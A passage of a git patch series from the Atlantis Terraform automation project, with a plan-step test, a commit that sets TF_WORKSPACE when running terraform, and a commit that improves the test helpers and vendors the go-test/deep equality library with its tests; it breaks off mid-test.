os.MkdirAll(filepath.Join(tmpDir, "env"), 0700) + Ok(t, err) + envVarsFile := filepath.Join(tmpDir, "env/workspace.tfvars") + err = ioutil.WriteFile(envVarsFile, nil, 0644) + Ok(t, err) + + // Using version >= 0.10 here so we don't expect any env commands. + tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} + When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was never called since we're in version >= 0.10 + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") +} From 06f68b88e4961e3a7761255b8af35fa952a7a87a Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 15:20:21 -0700 Subject: [PATCH 05/69] Add TF_WORKSPACE env var when execing terraform Even though we're switching to the right workspace this is a nice safeguard to have. I don't think it incurs additional time. --- server/events/terraform/terraform_client.go | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go index de3d6d23a4..a3508be724 100644 --- a/server/events/terraform/terraform_client.go +++ b/server/events/terraform/terraform_client.go @@ -107,6 +107,13 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st "TF_IN_AUTOMATION=true", // Cache plugins so terraform init runs faster. fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir), + // Terraform will run all commands in this workspace. We should have + // already selected this workspace but this is a fail-safe to ensure + // we're operating in the right workspace. + fmt.Sprintf("TF_WORKSPACE=%s", workspace), + // We're keeping this variable even though it duplicates TF_WORKSPACE + // because it's probably safer for users to rely on it. Terraform might + // change the way TF_WORKSPACE works in the future. fmt.Sprintf("WORKSPACE=%s", workspace), fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()), fmt.Sprintf("DIR=%s", path), From a22e23718c4ea4190a01c9c722b54134c1f7029d Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:48:47 -0700 Subject: [PATCH 06/69] Improve test helpers. --- Gopkg.lock | 8 +- Gopkg.toml | 4 + testing/assertions.go | 25 +- testing/temp_files.go | 15 + vendor/github.com/go-test/deep/.gitignore | 2 + vendor/github.com/go-test/deep/.travis.yml | 13 + vendor/github.com/go-test/deep/CHANGES.md | 9 + vendor/github.com/go-test/deep/LICENSE | 21 + vendor/github.com/go-test/deep/README.md | 51 ++ vendor/github.com/go-test/deep/deep.go | 352 +++++++++ vendor/github.com/go-test/deep/deep_test.go | 821 ++++++++++++++++++++ 11 files changed, 1315 insertions(+), 6 deletions(-) create mode 100644 testing/temp_files.go create mode 100644 vendor/github.com/go-test/deep/.gitignore create mode 100644 vendor/github.com/go-test/deep/.travis.yml create mode 100644 vendor/github.com/go-test/deep/CHANGES.md create mode 100644 vendor/github.com/go-test/deep/LICENSE create mode 100644 vendor/github.com/go-test/deep/README.md create mode 100644 vendor/github.com/go-test/deep/deep.go create mode 100644 vendor/github.com/go-test/deep/deep_test.go diff --git a/Gopkg.lock b/Gopkg.lock index 8e3c34c6e2..9b1d483313 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -31,6 +31,12 @@ revision = "629574ca2a5df945712d3079857300b5e4da0236" version = "v1.4.2" +[[projects]] + name = "github.com/go-test/deep" + packages = ["."] + revision = "6592d9cc0a499ad2d5f574fde80a2b5c5cc3b4f5" + version = "v1.0.1" + [[projects]] branch = "master" name = "github.com/google/go-github" @@ -276,6 +282,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "00be02ec7fa459d29d2f8b3ab70a8fdf7e6c1085f4a6fd53ab6db452e0ade9da" + inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 3e16969628..92f54862f5 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -88,3 +88,7 @@ [[constraint]] branch = "master" name = "github.com/lkysow/go-gitlab" + +[[constraint]] + name = "github.com/go-test/deep" + version = "1.0.1" diff --git a/testing/assertions.go b/testing/assertions.go index cd5bf3ba5b..efb2ce9b14 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -16,9 +16,11 @@ package testing import ( "fmt" "path/filepath" - "reflect" "runtime" + "strings" "testing" + + "github.com/go-test/deep" ) // Assert fails the test if the condition is false. @@ -44,10 +46,11 @@ func Ok(tb testing.TB, err error) { // Equals fails the test if exp is not equal to act. // Taken from https://github.com/benbjohnson/testing. func Equals(tb testing.TB, exp, act interface{}) { - if !reflect.DeepEqual(exp, act) { + tb.Helper() + if diff := deep.Equal(exp, act); diff != nil { _, file, line, _ := runtime.Caller(1) fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act) - tb.FailNow() + tb.Fatal(diff) } } @@ -55,10 +58,22 @@ func Equals(tb testing.TB, exp, act interface{}) { func ErrEquals(tb testing.TB, exp string, act error) { tb.Helper() if act == nil { - tb.Errorf("exp err %q but err was nil", exp) + tb.Fatalf("exp err %q but err was nil", exp) } if act.Error() != exp { - tb.Errorf("exp err: %q but got: %q", exp, act.Error()) + tb.Fatalf("exp err: %q but got: %q", exp, act.Error()) + } +} + +// ErrContains fails the test if act is nil or act.Error() does not contain +// substr. +func ErrContains(tb testing.TB, substr string, act error) { + tb.Helper() + if act == nil { + tb.Fatalf("exp err to contain %q but err was nil", substr) + } + if !strings.Contains(act.Error(), substr) { + tb.Fatalf("exp err %q to contain $q", act.Error(), substr) } } diff --git a/testing/temp_files.go b/testing/temp_files.go new file mode 100644 index 0000000000..f91074967a --- /dev/null +++ b/testing/temp_files.go @@ -0,0 +1,15 @@ +package testing + +import ( + "io/ioutil" + "os" + "testing" +) + +// TempDir creates a temporary directory and returns its path along +// with a cleanup function to be called via defer. +func TempDir(t *testing.T) (string, func()) { + tmpDir, err := ioutil.TempDir("", "") + Ok(t, err) + return tmpDir, func() { os.RemoveAll(tmpDir) } +} diff --git a/vendor/github.com/go-test/deep/.gitignore b/vendor/github.com/go-test/deep/.gitignore new file mode 100644 index 0000000000..53f12f0f0e --- /dev/null +++ b/vendor/github.com/go-test/deep/.gitignore @@ -0,0 +1,2 @@ +*.swp +*.out diff --git a/vendor/github.com/go-test/deep/.travis.yml b/vendor/github.com/go-test/deep/.travis.yml new file mode 100644 index 0000000000..2279c61427 --- /dev/null +++ b/vendor/github.com/go-test/deep/.travis.yml @@ -0,0 +1,13 @@ +language: go + +go: + - 1.7 + - 1.8 + - 1.9 + +before_install: + - go get github.com/mattn/goveralls + - go get golang.org/x/tools/cover + +script: + - $HOME/gopath/bin/goveralls -service=travis-ci diff --git a/vendor/github.com/go-test/deep/CHANGES.md b/vendor/github.com/go-test/deep/CHANGES.md new file mode 100644 index 0000000000..4351819d68 --- /dev/null +++ b/vendor/github.com/go-test/deep/CHANGES.md @@ -0,0 +1,9 @@ +# go-test/deep Changelog + +## v1.0.1 released 2018-01-28 + +* Fixed #12: Arrays are not properly compared (samlitowitz) + +## v1.0.0 releaesd 2017-10-27 + +* First release diff --git a/vendor/github.com/go-test/deep/LICENSE b/vendor/github.com/go-test/deep/LICENSE new file mode 100644 index 0000000000..228ef16f74 --- /dev/null +++ b/vendor/github.com/go-test/deep/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright 2015-2017 Daniel Nichter + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/vendor/github.com/go-test/deep/README.md b/vendor/github.com/go-test/deep/README.md new file mode 100644 index 0000000000..3b78eac7c1 --- /dev/null +++ b/vendor/github.com/go-test/deep/README.md @@ -0,0 +1,51 @@ +# Deep Variable Equality for Humans + +[![Go Report Card](https://goreportcard.com/badge/github.com/go-test/deep)](https://goreportcard.com/report/github.com/go-test/deep) [![Build Status](https://travis-ci.org/go-test/deep.svg?branch=master)](https://travis-ci.org/go-test/deep) [![Coverage Status](https://coveralls.io/repos/github/go-test/deep/badge.svg?branch=master)](https://coveralls.io/github/go-test/deep?branch=master) [![GoDoc](https://godoc.org/github.com/go-test/deep?status.svg)](https://godoc.org/github.com/go-test/deep) + +This package provides a single function: `deep.Equal`. It's like [reflect.DeepEqual](http://golang.org/pkg/reflect/#DeepEqual) but much friendlier to humans (or any sentient being) for two reason: + +* `deep.Equal` returns a list of differences +* `deep.Equal` does not compare unexported fields (by default) + +`reflect.DeepEqual` is good (like all things Golang!), but it's a game of [Hunt the Wumpus](https://en.wikipedia.org/wiki/Hunt_the_Wumpus). For large maps, slices, and structs, finding the difference is difficult. + +`deep.Equal` doesn't play games with you, it lists the differences: + +```go +package main_test + +import ( + "testing" + "github.com/go-test/deep" +) + +type T struct { + Name string + Numbers []float64 +} + +func TestDeepEqual(t *testing.T) { + // Can you spot the difference? + t1 := T{ + Name: "Isabella", + Numbers: []float64{1.13459, 2.29343, 3.010100010}, + } + t2 := T{ + Name: "Isabella", + Numbers: []float64{1.13459, 2.29843, 3.010100010}, + } + + if diff := deep.Equal(t1, t2); diff != nil { + t.Error(diff) + } +} +``` + + +``` +$ go test +--- FAIL: TestDeepEqual (0.00s) + main_test.go:25: [Numbers.slice[1]: 2.29343 != 2.29843] +``` + +The difference is in `Numbers.slice[1]`: the two values aren't equal using Go `==`. diff --git a/vendor/github.com/go-test/deep/deep.go b/vendor/github.com/go-test/deep/deep.go new file mode 100644 index 0000000000..4ea14cb04e --- /dev/null +++ b/vendor/github.com/go-test/deep/deep.go @@ -0,0 +1,352 @@ +// Package deep provides function deep.Equal which is like reflect.DeepEqual but +// returns a list of differences. This is helpful when comparing complex types +// like structures and maps. +package deep + +import ( + "errors" + "fmt" + "log" + "reflect" + "strings" +) + +var ( + // FloatPrecision is the number of decimal places to round float values + // to when comparing. + FloatPrecision = 10 + + // MaxDiff specifies the maximum number of differences to return. + MaxDiff = 10 + + // MaxDepth specifies the maximum levels of a struct to recurse into. + MaxDepth = 10 + + // LogErrors causes errors to be logged to STDERR when true. + LogErrors = false + + // CompareUnexportedFields causes unexported struct fields, like s in + // T{s int}, to be comparsed when true. + CompareUnexportedFields = false +) + +var ( + // ErrMaxRecursion is logged when MaxDepth is reached. + ErrMaxRecursion = errors.New("recursed to MaxDepth") + + // ErrTypeMismatch is logged when Equal passed two different types of values. + ErrTypeMismatch = errors.New("variables are different reflect.Type") + + // ErrNotHandled is logged when a primitive Go kind is not handled. + ErrNotHandled = errors.New("cannot compare the reflect.Kind") +) + +type cmp struct { + diff []string + buff []string + floatFormat string +} + +var errorType = reflect.TypeOf((*error)(nil)).Elem() + +// Equal compares variables a and b, recursing into their structure up to +// MaxDepth levels deep, and returns a list of differences, or nil if there are +// none. Some differences may not be found if an error is also returned. +// +// If a type has an Equal method, like time.Equal, it is called to check for +// equality. +func Equal(a, b interface{}) []string { + aVal := reflect.ValueOf(a) + bVal := reflect.ValueOf(b) + c := &cmp{ + diff: []string{}, + buff: []string{}, + floatFormat: fmt.Sprintf("%%.%df", FloatPrecision), + } + if a == nil && b == nil { + return nil + } else if a == nil && b != nil { + c.saveDiff(b, "") + } else if a != nil && b == nil { + c.saveDiff(a, "") + } + if len(c.diff) > 0 { + return c.diff + } + + c.equals(aVal, bVal, 0) + if len(c.diff) > 0 { + return c.diff // diffs + } + return nil // no diffs +} + +func (c *cmp) equals(a, b reflect.Value, level int) { + if level > MaxDepth { + logError(ErrMaxRecursion) + return + } + + // Check if one value is nil, e.g. T{x: *X} and T.x is nil + if !a.IsValid() || !b.IsValid() { + if a.IsValid() && !b.IsValid() { + c.saveDiff(a.Type(), "") + } else if !a.IsValid() && b.IsValid() { + c.saveDiff("", b.Type()) + } + return + } + + // If differenet types, they can't be equal + aType := a.Type() + bType := b.Type() + if aType != bType { + c.saveDiff(aType, bType) + logError(ErrTypeMismatch) + return + } + + // Primitive https://golang.org/pkg/reflect/#Kind + aKind := a.Kind() + bKind := b.Kind() + + // If both types implement the error interface, compare the error strings. + // This must be done before dereferencing because the interface is on a + // pointer receiver. + if aType.Implements(errorType) && bType.Implements(errorType) { + if a.Elem().IsValid() && b.Elem().IsValid() { // both err != nil + aString := a.MethodByName("Error").Call(nil)[0].String() + bString := b.MethodByName("Error").Call(nil)[0].String() + if aString != bString { + c.saveDiff(aString, bString) + } + return + } + } + + // Dereference pointers and interface{} + if aElem, bElem := (aKind == reflect.Ptr || aKind == reflect.Interface), + (bKind == reflect.Ptr || bKind == reflect.Interface); aElem || bElem { + + if aElem { + a = a.Elem() + } + + if bElem { + b = b.Elem() + } + + c.equals(a, b, level+1) + return + } + + // Types with an Equal(), like time.Time. + eqFunc := a.MethodByName("Equal") + if eqFunc.IsValid() { + retVals := eqFunc.Call([]reflect.Value{b}) + if !retVals[0].Bool() { + c.saveDiff(a, b) + } + return + } + + switch aKind { + + ///////////////////////////////////////////////////////////////////// + // Iterable kinds + ///////////////////////////////////////////////////////////////////// + + case reflect.Struct: + /* + The variables are structs like: + type T struct { + FirstName string + LastName string + } + Type = .T, Kind = reflect.Struct + + Iterate through the fields (FirstName, LastName), recurse into their values. + */ + for i := 0; i < a.NumField(); i++ { + if aType.Field(i).PkgPath != "" && !CompareUnexportedFields { + continue // skip unexported field, e.g. s in type T struct {s string} + } + + c.push(aType.Field(i).Name) // push field name to buff + + // Get the Value for each field, e.g. FirstName has Type = string, + // Kind = reflect.String. + af := a.Field(i) + bf := b.Field(i) + + // Recurse to compare the field values + c.equals(af, bf, level+1) + + c.pop() // pop field name from buff + + if len(c.diff) >= MaxDiff { + break + } + } + case reflect.Map: + /* + The variables are maps like: + map[string]int{ + "foo": 1, + "bar": 2, + } + Type = map[string]int, Kind = reflect.Map + + Or: + type T map[string]int{} + Type = .T, Kind = reflect.Map + + Iterate through the map keys (foo, bar), recurse into their values. + */ + + if a.IsNil() || b.IsNil() { + if a.IsNil() && !b.IsNil() { + c.saveDiff("", b) + } else if !a.IsNil() && b.IsNil() { + c.saveDiff(a, "") + } + return + } + + if a.Pointer() == b.Pointer() { + return + } + + for _, key := range a.MapKeys() { + c.push(fmt.Sprintf("map[%s]", key)) + + aVal := a.MapIndex(key) + bVal := b.MapIndex(key) + if bVal.IsValid() { + c.equals(aVal, bVal, level+1) + } else { + c.saveDiff(aVal, "") + } + + c.pop() + + if len(c.diff) >= MaxDiff { + return + } + } + + for _, key := range b.MapKeys() { + if aVal := a.MapIndex(key); aVal.IsValid() { + continue + } + + c.push(fmt.Sprintf("map[%s]", key)) + c.saveDiff("", b.MapIndex(key)) + c.pop() + if len(c.diff) >= MaxDiff { + return + } + } + case reflect.Array: + n := a.Len() + for i := 0; i < n; i++ { + c.push(fmt.Sprintf("array[%d]", i)) + c.equals(a.Index(i), b.Index(i), level+1) + c.pop() + if len(c.diff) >= MaxDiff { + break + } + } + case reflect.Slice: + if a.IsNil() || b.IsNil() { + if a.IsNil() && !b.IsNil() { + c.saveDiff("", b) + } else if !a.IsNil() && b.IsNil() { + c.saveDiff(a, "") + } + return + } + + if a.Pointer() == b.Pointer() { + return + } + + aLen := a.Len() + bLen := b.Len() + n := aLen + if bLen > aLen { + n = bLen + } + for i := 0; i < n; i++ { + c.push(fmt.Sprintf("slice[%d]", i)) + if i < aLen && i < bLen { + c.equals(a.Index(i), b.Index(i), level+1) + } else if i < aLen { + c.saveDiff(a.Index(i), "") + } else { + c.saveDiff("", b.Index(i)) + } + c.pop() + if len(c.diff) >= MaxDiff { + break + } + } + + ///////////////////////////////////////////////////////////////////// + // Primitive kinds + ///////////////////////////////////////////////////////////////////// + + case reflect.Float32, reflect.Float64: + // Avoid 0.04147685731961082 != 0.041476857319611 + // 6 decimal places is close enough + aval := fmt.Sprintf(c.floatFormat, a.Float()) + bval := fmt.Sprintf(c.floatFormat, b.Float()) + if aval != bval { + c.saveDiff(a.Float(), b.Float()) + } + case reflect.Bool: + if a.Bool() != b.Bool() { + c.saveDiff(a.Bool(), b.Bool()) + } + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + if a.Int() != b.Int() { + c.saveDiff(a.Int(), b.Int()) + } + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64: + if a.Uint() != b.Uint() { + c.saveDiff(a.Uint(), b.Uint()) + } + case reflect.String: + if a.String() != b.String() { + c.saveDiff(a.String(), b.String()) + } + + default: + logError(ErrNotHandled) + } +} + +func (c *cmp) push(name string) { + c.buff = append(c.buff, name) +} + +func (c *cmp) pop() { + if len(c.buff) > 0 { + c.buff = c.buff[0 : len(c.buff)-1] + } +} + +func (c *cmp) saveDiff(aval, bval interface{}) { + if len(c.buff) > 0 { + varName := strings.Join(c.buff, ".") + c.diff = append(c.diff, fmt.Sprintf("%s: %v != %v", varName, aval, bval)) + } else { + c.diff = append(c.diff, fmt.Sprintf("%v != %v", aval, bval)) + } +} + +func logError(err error) { + if LogErrors { + log.Println(err) + } +} diff --git a/vendor/github.com/go-test/deep/deep_test.go b/vendor/github.com/go-test/deep/deep_test.go new file mode 100644 index 0000000000..e764659b95 --- /dev/null +++ b/vendor/github.com/go-test/deep/deep_test.go @@ -0,0 +1,821 @@ +package deep_test + +import ( + "errors" + "fmt" + "testing" + "time" + + "github.com/go-test/deep" +) + +func TestString(t *testing.T) { + diff := deep.Equal("foo", "foo") + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal("foo", "bar") + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "foo != bar" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestFloat(t *testing.T) { + diff := deep.Equal(1.1, 1.1) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1.1234561, 1.1234562) + if diff == nil { + t.Error("no diff") + } + + defaultFloatPrecision := deep.FloatPrecision + deep.FloatPrecision = 6 + defer func() { deep.FloatPrecision = defaultFloatPrecision }() + + diff = deep.Equal(1.1234561, 1.1234562) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1.123456, 1.123457) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "1.123456 != 1.123457" { + t.Error("wrong diff:", diff[0]) + } + +} + +func TestInt(t *testing.T) { + diff := deep.Equal(1, 1) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1, 2) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "1 != 2" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestUint(t *testing.T) { + diff := deep.Equal(uint(2), uint(2)) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(uint(2), uint(3)) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "2 != 3" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestBool(t *testing.T) { + diff := deep.Equal(true, true) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(false, false) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(true, false) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "true != false" { // unless you're fipar + t.Error("wrong diff:", diff[0]) + } +} + +func TestTypeMismatch(t *testing.T) { + type T1 int // same type kind (int) + type T2 int // but different type + var t1 T1 = 1 + var t2 T2 = 1 + diff := deep.Equal(t1, t2) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "deep_test.T1 != deep_test.T2" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestKindMismatch(t *testing.T) { + deep.LogErrors = true + + var x int = 100 + var y float64 = 100 + diff := deep.Equal(x, y) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "int != float64" { + t.Error("wrong diff:", diff[0]) + } + + deep.LogErrors = false +} + +func TestDeepRecursion(t *testing.T) { + deep.MaxDepth = 2 + defer func() { deep.MaxDepth = 10 }() + + type s3 struct { + S int + } + type s2 struct { + S s3 + } + type s1 struct { + S s2 + } + foo := map[string]s1{ + "foo": { // 1 + S: s2{ // 2 + S: s3{ // 3 + S: 42, // 4 + }, + }, + }, + } + bar := map[string]s1{ + "foo": { + S: s2{ + S: s3{ + S: 100, + }, + }, + }, + } + diff := deep.Equal(foo, bar) + + defaultMaxDepth := deep.MaxDepth + deep.MaxDepth = 4 + defer func() { deep.MaxDepth = defaultMaxDepth }() + + diff = deep.Equal(foo, bar) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo].S.S.S: 42 != 100" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestMaxDiff(t *testing.T) { + a := []int{1, 2, 3, 4, 5, 6, 7} + b := []int{0, 0, 0, 0, 0, 0, 0} + + defaultMaxDiff := deep.MaxDiff + deep.MaxDiff = 3 + defer func() { deep.MaxDiff = defaultMaxDiff }() + + diff := deep.Equal(a, b) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + defaultCompareUnexportedFields := deep.CompareUnexportedFields + deep.CompareUnexportedFields = true + defer func() { deep.CompareUnexportedFields = defaultCompareUnexportedFields }() + type fiveFields struct { + a int // unexported fields require ^ + b int + c int + d int + e int + } + t1 := fiveFields{1, 2, 3, 4, 5} + t2 := fiveFields{0, 0, 0, 0, 0} + diff = deep.Equal(t1, t2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + // Same keys, too many diffs + m1 := map[int]int{ + 1: 1, + 2: 2, + 3: 3, + 4: 4, + 5: 5, + } + m2 := map[int]int{ + 1: 0, + 2: 0, + 3: 0, + 4: 0, + 5: 0, + } + diff = deep.Equal(m1, m2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Log(diff) + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + // Too many missing keys + m1 = map[int]int{ + 1: 1, + 2: 2, + } + m2 = map[int]int{ + 1: 1, + 2: 2, + 3: 0, + 4: 0, + 5: 0, + 6: 0, + 7: 0, + } + diff = deep.Equal(m1, m2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Log(diff) + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } +} + +func TestNotHandled(t *testing.T) { + a := func(int) {} + b := func(int) {} + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("got diffs:", diff) + } +} + +func TestStruct(t *testing.T) { + type s1 struct { + id int + Name string + Number int + } + sa := s1{ + id: 1, + Name: "foo", + Number: 2, + } + sb := sa + diff := deep.Equal(sa, sb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + sb.Name = "bar" + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + + sb.Number = 22 + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 2 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + if diff[1] != "Number: 2 != 22" { + t.Error("wrong diff:", diff[1]) + } + + sb.id = 11 + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 2 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + if diff[1] != "Number: 2 != 22" { + t.Error("wrong diff:", diff[1]) + } +} + +func TestNestedStruct(t *testing.T) { + type s2 struct { + Nickname string + } + type s1 struct { + Name string + Alias s2 + } + sa := s1{ + Name: "Robert", + Alias: s2{Nickname: "Bob"}, + } + sb := sa + diff := deep.Equal(sa, sb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + sb.Alias.Nickname = "Bobby" + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "Alias.Nickname: Bob != Bobby" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestMap(t *testing.T) { + ma := map[string]int{ + "foo": 1, + "bar": 2, + } + mb := map[string]int{ + "foo": 1, + "bar": 2, + } + diff := deep.Equal(ma, mb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(ma, ma) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + mb["foo"] = 111 + diff = deep.Equal(ma, mb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: 1 != 111" { + t.Error("wrong diff:", diff[0]) + } + + delete(mb, "foo") + diff = deep.Equal(ma, mb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: 1 != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(mb, ma) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: != 1" { + t.Error("wrong diff:", diff[0]) + } + + var mc map[string]int + diff = deep.Equal(ma, mc) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + // handle hash order randomness + if diff[0] != "map[foo:1 bar:2] != " && diff[0] != "map[bar:2 foo:1] != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(mc, ma) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != map[foo:1 bar:2]" && diff[0] != " != map[bar:2 foo:1]" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestArray(t *testing.T) { + a := [3]int{1, 2, 3} + b := [3]int{1, 2, 3} + + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(a, a) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + b[2] = 333 + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "array[2]: 3 != 333" { + t.Error("wrong diff:", diff[0]) + } + + c := [3]int{1, 2, 2} + diff = deep.Equal(a, c) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "array[2]: 3 != 2" { + t.Error("wrong diff:", diff[0]) + } + + var d [2]int + diff = deep.Equal(a, d) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "[3]int != [2]int" { + t.Error("wrong diff:", diff[0]) + } + + e := [12]int{} + f := [12]int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10} + diff = deep.Equal(e, f) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != deep.MaxDiff { + t.Error("not enough diffs:", diff) + } + for i := 0; i < deep.MaxDiff; i++ { + if diff[i] != fmt.Sprintf("array[%d]: 0 != %d", i+1, i+1) { + t.Error("wrong diff:", diff[i]) + } + } +} + +func TestSlice(t *testing.T) { + a := []int{1, 2, 3} + b := []int{1, 2, 3} + + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(a, a) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + b[2] = 333 + diff = deep.Equal(a, b) + if diff 